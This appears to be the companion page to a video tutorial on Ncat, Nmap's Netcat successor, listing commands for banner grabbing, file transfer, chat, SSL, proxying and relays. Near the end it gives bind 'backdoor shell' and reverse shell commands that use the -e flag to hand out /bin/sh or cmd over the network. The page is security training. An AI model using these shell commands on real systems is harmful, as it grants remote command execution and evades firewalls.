Ncat Tutorial: A modern Netcat from the Nmap team (Hacking Illustrated Series InfoSec Tutorial Videos)
Ncat Tutorial: A modern Netcat from the Nmap team
For those not in the know, Netcat is a utility who's goal is to be like the
Unix cat command, but for network connections. It has been referred to as
a "Swiss-army knife for TCP/IP" for good reason, with it you can:
1. Create simple telnet and other types of servers.
2. Banner grab.
3. Transfer files.
4. Do sockets (sort of) in shell and batch scripts, thus making a
script that does about anything you want on the network.
and much more. You really don't get the power of Netcat from the simple concept
until you start playing with it.
I've know about Netcat for years, but I can't say I've played with it much
until I took Ed Skoudis' and John Strand's SANS 560 course. During the class I
told Ed I was going to adapt his Netcat primer into a video. Well, I dragged my
feet on that till Fyodor and the Nmap team put out Ncat, an actively developed
multi-platform implementation of the Netcat concept. While there have been many
implementations of Netcat since Hobbit's original, I feel Ncat has the brightest
future. In this video I'll explain most of the Ncat flags, though I will not use
all of them in the examples. The Ncat demos I give in this video should get you
started with your own ideas of how you can use Ncat.
This one is HUGE, you may want to just download it using the link below:
If the embedded video below does not show
RIGHT click here to save the file to your hard drive.
Some of the commands used in this tutorial:
Simple Banner grab:
C:\client>ncat google.com 80
GET / HTTP/1.1
Use as telnet client:
C:\client>ncat -t 192.168.1.1 23
Simple Web Server:
C:\server>ncat -l 127.0.0.1 80 < stuff.txt
C:\client>ncat localhost 80
C:\server>ncat -l --keep-open 74 <
stuff.txt
C:\client>ncat localhost 74
Copy file with UDP:
C:\server>ncat -l 74 --udp
C:\client>ncat --udp localhost 74 <
stuff.txt
Use Source port and source address:
C:\client>ncat www.irongeek.com 80
-p 80 -s 127.0.0.1
C:\client>ncat www.irongeek.com 80 -p 80 -s
192.168.1.1
Brokered connection to many hosts:
C:\server>ncat -l 74
C:\client1>ncat localhost 74
C:\client2>ncat localhost 74
C:\server>ncat -l 74 --broker
C:\client1>ncat localhost 74
C:\client2>ncat localhost 74
Simple Chat:
C:\server>ncat -l 74 --chat
C:\client1>ncat localhost 74
C:\client2>ncat localhost 74
SSL Header Grab:
C:\client>ncat gmail.google.com 443
GET / HTTP/1.1
C:\client>ncat gmail.google.com 443 --ssl
GET / HTTP/1.1
File transfer with SSL:
C:\server>ncat.exe -l --ssl 74 --send-only
< ncat.exe
C:\client>ncat localhost 74 --ssl >
out2.exe
(ends self)
C:\client>ncat --ssl -vvv -l > newfile
C:\server>ncat -v --send-only --ssl
localhost < ncat.exe
(Good for getting around NAT)
Simple proxy Server:
C:\ncat>ncat -l 8080 --proxy-type
http --proxy-auth adc:test --ssl
Normal Backdoor Shell:
Linux:
ncat -l 23 -e /bin/sh
C:\server>ncat 192.168.159.128 23
Windows:
C:\server>ncat -l 23 -e cmd
ncat
192.168.159.129 23
Edit!!!!
Reverse Shell (AKA:Shovel a shell, and get past NAT and
firewalls with week egress filtering):
ncat -l 74
C:\server>ncat
192.168.159.128 74 -e cmd
Another Crappy Web Server:
C:\server>ncat -l 80 -c "type http.txt"
Access control:
Windows:
C:\server>ncat -l 23 -e cmd --allow
192.168.159.128
ncat
192.168.159.129 23
Ncat relay:
C:\ncat>ncat -l localhost 80 --sh-exec
"ncat google.com 80 -o text.txt -x hex.txt"
Printable version of this article